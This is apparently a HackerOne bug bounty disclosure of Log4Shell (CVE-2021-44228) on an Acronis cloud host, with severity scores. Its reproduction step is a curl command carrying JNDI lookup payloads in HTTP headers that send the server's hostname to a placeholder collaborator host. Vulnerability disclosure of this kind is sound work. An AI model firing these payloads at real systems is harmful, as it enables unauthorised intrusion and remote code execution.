Lucene search

MikkocarreonH1:1459714

HistoryJan 25, 2022 - 7:33 a.m.

Acronis: [CVE-2021-44228] Arbitrary Code Execution on ng01-cloud.acronis.com

2022-01-2507:33:15

mikkocarreon

hackerone.com

log4j vulnerability

remote command execution

burp collaborator

curl command

vulnerable host

pingback

log4shell

cve-2021-44228

lunasec.io article

impact

bug bounty

CVSS2

9.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:M/Au:N/C:C/I:C/A:C

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

AI Score

8.8

Confidence

High

EPSS

0.965

Percentile

99.6%

JSON

Description

The application is using a vulnerable version of Log4j which allows arbitrary remote command execution. The vulnerability is also known as Log4Shell and is assigned CVE-2021-44228.

Reproduction Steps

For easier reproduction, please use Burp Collaborator and issue the following curl command with your collaborator instance URL;

curl --http1.1 --silent --output /dev/null \
--header 'User-agent: ${jndi:ldap://${hostName}.&lt;COLLABORATOR_URL&gt;/a}' \
--header 'X-Forwarded-For: ${jndi:ldap://${hostName}.&lt;COLLABORATOR_URL&gt;/a}' \
--header 'Referer: ${jndi:ldap://${hostName}.&lt;COLLABORATOR_URL&gt;/a}' \
https://ng01-cloud.acronis.com

You should receive a request to your Collaborator Client with your server’s hostname as the prefix. That should suffice to prove that the host is vulnerable. The hostname I received was ng01-cloud-elk-ls-vm01.

Note that it may take some time to receive the pingbacks. In case Burp Collaborator doesn’t work, I’d advise using your own. Some alternatives are;